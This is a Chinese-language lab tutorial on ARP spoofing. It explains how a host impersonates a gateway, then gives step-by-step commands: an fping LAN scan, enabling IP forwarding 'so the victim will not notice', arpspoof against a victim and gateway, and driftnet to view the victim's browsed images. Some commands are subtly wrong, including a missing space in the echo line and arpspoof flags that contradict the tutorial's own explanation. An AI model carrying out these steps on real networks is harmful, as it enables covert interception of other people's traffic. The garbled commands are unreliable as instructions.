arp攻击mac欺骗原理
1.一般情况下,ARP欺骗并不是使网络无法正常通信,而是通过冒充网关或其他主
机使得到达网关或主机的流量通过攻击进行转发。通过转发流量可以对流量进
行控制和查看,从而控制流量或得到机密信息。
2.ARP欺骗发送arp应答给局域网中其他的主机,其中包含网关的IP地址和进行
ARP欺骗的主机MAC地址;并且也发送了ARP应答给网关,其中包含局域网中所
有主机的IP地址和进行arp欺骗的主机MAC地址。当局域网中主机和网关收到
ARP应答跟新ARP表后,主机和网关之间的流量就需要通过攻击主机进行转发。
冒充主机的过程和冒充网关相同。
实验环境:kali(攻击机)
ip:172.27.13.31
w10(受害机)
ip:172.27.13.12
网关:172.27.13.254
第一步:
查看局域网下开放的ip
fping -asg 172.27.13.1/24 (然后确定好目标ip)
第二步:
Kali开启ip转发(在进行arp欺骗之前必须要开启IP转发,否则当欺骗成功之后,攻击目标会断网,这样会被发觉)
echo1 >/proc/sys/net/ipv4/ip_forward
第三步:
开启后在kali上对受害机进行攻击
arpspoof -t eth0 -i 172.27.13.12 172.27.13.254 (arpspoof -i 攻击机网卡 -t 受害机ip 受害机网关)
第四步:
打开另一个终端,使用driftnet进行流量监控,显示图片(输入driftnet 后会有一个小窗口,把他放大点就行了,被监控到的所有图片都会在那里面显示)
driftnet -i eth0 (driftnet -i 攻击机网卡)
到此为止,实验已经成功了,这里已经看到对方正在浏览的图片了。